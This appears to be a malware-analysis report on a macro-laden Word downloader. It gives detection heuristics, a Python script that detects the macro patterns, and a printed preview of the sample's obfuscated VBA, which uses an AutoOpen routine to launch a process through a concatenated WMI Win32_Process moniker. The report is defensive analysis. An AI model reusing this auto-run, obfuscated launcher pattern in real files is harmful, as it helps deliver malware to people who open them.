Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The file contains VBA macros with an AutoOpen procedure, so the macro code runs as soon as the document is opened in Word with macros enabled. The critical heuristic is the use of WMI (GetObject on a "winmgmts:Win32_Process" moniker followed by .Create) to launch a process, a common technique for downloading and executing further malicious code. In the extracted source the moniker is split across concatenated string literals and line continuations, and the command line passed to .Create is assembled at runtime from UserForm control properties (ControlTipText, PasswordChar, ControlSource), so it is not visible in the decoded .bas text; the rest of the module is junk While/Wend loops and comment padding. The ClamAV detection name Doc.Downloader.Smpowloadbb-6965585-0 supports the downloader classification. The generic description attached to the legacy WordBasic marker heuristic (no modern VBA project recovered) is rule boilerplate for that rule; a decoded VBA project was in fact recovered and is listed under Extracted artifacts.
Heuristics (7)

| Heuristic | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Downloader.Smpowloadbb-6965585-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6965585-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| VBA WMI Win32_Process launcher | critical | OLE_VBA_WMI_PROCESS_CREATE | VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier, not a download location. |
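The three macro heuristics above (AutoOpen, GetObject, WMI Win32_Process launcher) can be reproduced over decoded VBA source once the obfuscation the sample uses is undone: comment padding, `_` line continuations and `"a" + "b"` literal concatenation. The script below is an added example, not the analyzer's own rules or oletools code. It normalizes the source, applies approximations of the rule IDs used in this report, and also lists which UserForm control properties feed the `.Create` argument, which explains why the command line is absent from the .bas text. `SAMPLE_VBA` is a constructed excerpt modelled on the macro preview further down, not the sample's bytes; the rule regexes and helper names are this example's own.

```python
import re
from typing import Dict, List

# Constructed VBA excerpt modelled on the macro preview in this report. It is
# not the sample's bytes: junk While/Wend loops, comment padding, a continued
# Sub header and literal concatenation hide the WMI moniker the same way.
SAMPLE_VBA = r'''Attribute VB_Name = "t534464"
Sub _
autoopen()
On Error Resume Next
While Y42_27 And w81954
's815511F4001386b45305_j4992793
Wend
Call h820359
End Sub
Function h820359()
On Error Resume Next
J966227 = U5283625.i3587310.ControlTipText + F602_9.S144406 + U5283625.i3587310.PasswordChar
Set i829910 = A_13_00(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
i829910.Create E59934 + J966227 + J9466_, w348_082, s162558, S_1242
End Function
'''

_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')


def normalize_vba(src: str) -> str:
    """Drop comment lines, join ' _' continuations, fold literal concatenation."""
    lines = [l.strip() for l in src.splitlines()]
    text = "\n".join(l for l in lines if l and not l.startswith("'"))
    text = re.sub(r"[ \t]_\s*\n\s*", " ", text)   # "Sub _\nautoopen()" -> "Sub autoopen()"
    while True:                                    # "a" + "b" -> "ab", repeat until stable
        folded = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if folded == text:
            return text
        text = folded


# Rule names follow the heuristic identifiers used in this report; the regexes
# are this example's own approximation of them, not the analyzer's rules.
RULES = {
    "OLE_VBA_AUTOOPEN": re.compile(
        r"\b(?:Sub|Function)\s+(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec)\b", re.I),
    "OLE_VBA_GETOBJ": re.compile(r"\bGetObject\s*\(", re.I),
    "WMI_MONIKER": re.compile(r'"winmgmts:[^"]*Win32_Process"', re.I),
    "DOT_CREATE_CALL": re.compile(r"\.\s*Create\b", re.I),
    "FORM_PROPERTY_READ": re.compile(
        r"\.(ControlTipText|PasswordChar|ControlSource|Caption|Tag)\b", re.I),
}


def scan_vba(src: str) -> Dict[str, List[str]]:
    """Return {rule: [matching normalized lines]} for every rule that fired."""
    hits: Dict[str, List[str]] = {}
    for line in normalize_vba(src).splitlines():
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(line)
    return hits


def wmi_process_create(hits: Dict[str, List[str]]) -> bool:
    """Mirror OLE_VBA_WMI_PROCESS_CREATE: a Win32_Process moniker AND a .Create call."""
    return "WMI_MONIKER" in hits and "DOT_CREATE_CALL" in hits


def form_properties_read(hits: Dict[str, List[str]]) -> List[str]:
    """UserForm control properties that feed the command string. Their values
    live in the form streams, not in the .bas text, so the command line is not
    recoverable from this source alone."""
    props = set()
    for line in hits.get("FORM_PROPERTY_READ", []):
        props.update(p.lower() for p in RULES["FORM_PROPERTY_READ"].findall(line))
    return sorted(props)


if __name__ == "__main__":
    h = scan_vba(SAMPLE_VBA)
    for rule, lines in h.items():
        print(rule, "->", lines[0])
    print("wmi_process_create:", wmi_process_create(h))
    print("form properties read:", form_properties_read(h))
```

On the constructed excerpt this reports AutoOpen, GetObject, the folded `"winmgmts:Win32_Process"` moniker and the `.Create` call, and lists `controltiptext` and `passwordchar` as the properties that build the command. The literal folding only handles concatenated string constants; a moniker assembled from variables, `Chr()` calls or helper functions (the pattern the OLE_VBA_WMI_PROCESS_CREATE description warns about) needs deobfuscation, and recovering the actual command line requires the UserForm stream strings, which olevba extracts separately from the VBA modules.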
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6844 bytes | c8fd1eea131cb333dad26adbb644b225e00dbbd9513666b05e7b9ca0a8b82b43 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "W81829"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "U5283625"
Attribute VB_Base = "0{9CDA5053-7926-40C9-AF74-F886775F999C}{D1D1A016-7FCD-4AFF-AD12-316F0F95E952}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "G6_3__"
Attribute VB_Name = "n68739"
Attribute VB_Name = "F602_9"
Attribute VB_Base = "0{DCE02AED-0885-46D3-9C91-DE02FEA9443F}{16283B3C-023E-4097-8FFD-57A5340EF0BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "t534464"
Function A_13_00(k51065)
While d_0825 And F327358
'O_96423b5042471w5903432l7261919
'o7020_F91209_1c22101K4343043
'd7_3651i85714_3o90__9n739787
Wend
While z_53617 And j0669466
'C89_7300Y107_011z35890u9__92
'I19_8209C060362p3228_8_Z3873813
'p573305Z60033s11_30S53423
Wend
Set A_13_00 = CVar(k51065)
While f0848023 And i78_761
'S75678b3_91723K_6680n02_0_
'q33527j_007_z502900b02774_2
't1307450s6936_61z58789E708639
Wend
While j_70941 And t83_8770
'U6298774M703620h15_044F972139
'H042145p_6689j17355K_9168
'j9_2611C631729b96495_1j692610
Wend
While M46163 And l27545_
'D03208f44134c_8464m_612_
'u077_257v0746962O0791_5J28263
'X4561195U696128L97187h39221
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While Y42_27 And w81954
's815511F4001386b45305_j4992793
't530314v5435_V53_50U468441
'D_453360d42400p_86723p007494
Wend
While k0707116 And o620_30
'h82749_D12482F3_275F163_9
'p526331w58350_F7841304Z4143873
'q034781j2661739v801422X707_1
Wend
Call h820359
While F_429633 And i5713_
'w0807626s63160N144079M23774
'T1449_49t060950f8_2153a84233
'R161_6_2q540900V03_62M28749
Wend
While M219154 And H53057
'H12_787k59_5486Z989_9S7_669
'I178559z5492750i6423653M____27_
'F14_1496c7106000C24561n1_5270
Wend
End Sub
Attribute VB_Name = "K5821_21"
Function h820359()
On Error Resume Next
While s_903_5 And K_4065
'B372055_A12838O0664830F_6_62
'N6_7404z078759Q70___1A7261576
'k6725431Z689_98Y17214X02225
Wend
While S8_9621 And B72567
'l9_18207U27_41v93_5754Y_04357
'c86132O713287Z9557536J1_256_
'U9194_r243473_k_43620R588274
Wend
J966227 = U5283625.i3587310.ControlTipText + F602_9.S144406 + U5283625.i3587310.PasswordChar + F602_9.W925_358 + U5283625.i3587310 + U5283625.i3587310.ControlSource + F602_9.s27_4534 + U5283625.i3587310.ControlTipText + U5283625.i3587310.PasswordChar + F602_9.w50975 + U5283625.i3587310 + F602_9.h9022_ + U5283625.i3587310
While H38432 And V0_34_3
'I09945G6500_45j437867_u7481695
'p07628d_702279K32473_l942_1
'p996__t416324J22534d0_4979
Wend
While u51918 And w75037
'j_944273I11935J19739J943016
'w7109906T224122B19_28_D5279049
'X3_254C531970J8029_05q54136_
Wend
Set i829910 = A_13_00(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
While M7_3916 And M600434
'C0211739i406671s204802r0430199
'b4_122V14345j36530v124609
't32018j915770Q64__896z09737
Wend
While I067398_ And j_7384
'H93426D1_680i98160_1l8822428
'k08_71w580997c949325b__85__
'q18652m10006i_766833m94_80_
Wend
While V8058_08 And Y345_55
'I7117579Q23483q7_6_6D036369
'O57311Z263_8N74187F5973_9
'z50209Q6434231u6_78032b_642_
Wend
i829910.Create E59934 + J966227 + J9466_, w348_082, s162558, S_1242
While s0944_ And B2_7_8
'N92_6188b9_48324m_031995o8148034
'I1845918X8_623__L488209
... (truncated)